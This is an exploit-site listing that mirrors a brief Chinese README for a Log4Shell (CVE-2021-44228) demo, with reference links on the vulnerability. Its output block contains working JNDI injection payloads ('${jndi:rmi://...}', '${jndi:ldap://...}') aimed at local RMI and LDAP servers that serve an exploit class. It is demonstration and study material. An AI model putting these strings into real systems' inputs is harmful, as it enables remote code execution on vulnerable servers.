Exploit for Deserialization of Untrusted Data in Apache Log4J CVE-2021-44228

## https://sploitus.com/exploit?id=76F6F494-8855-5F94-9675-4474FFFA65A1
# CVE-2021-44228-Demo

利用 CVE-2021-44228，通过 RMI 和 LDAP 两种方式远程注入代码的示例。

![](./result.png)

```
Exploit class from RMI Server loaded
Hello, ${jndi:rmi://127.0.0.1:1099/exploit}
Exploit class from LDAP Server loaded
Hello, ${jndi:ldap://127.0.0.1:1389/org.mazhuang.ldap.Exploit}
```

RmiServer 和 LdapServer 启动依赖 Python3。

## 参考

- [Apache Log4j2远程代码执行漏洞复现](https://zhuanlan.zhihu.com/p/443689489)
- [Log4j高危漏洞！具体原因解析！全网第一！](https://www.bilibili.com/video/BV1FL411E7g3) 和 [Log4j高危漏洞 (补充视频)](https://www.bilibili.com/video/BV18U4y1K72L/)
- [Log4j Lookups](https://logging.apache.org/log4j/2.x/manual/lookups.html)
- [Apache Log4j2从RCE到RC1绕过](https://xz.aliyun.com/t/10649)
- [tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce)
- [PSA: Log4Shell and the current state of JNDI injection](https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)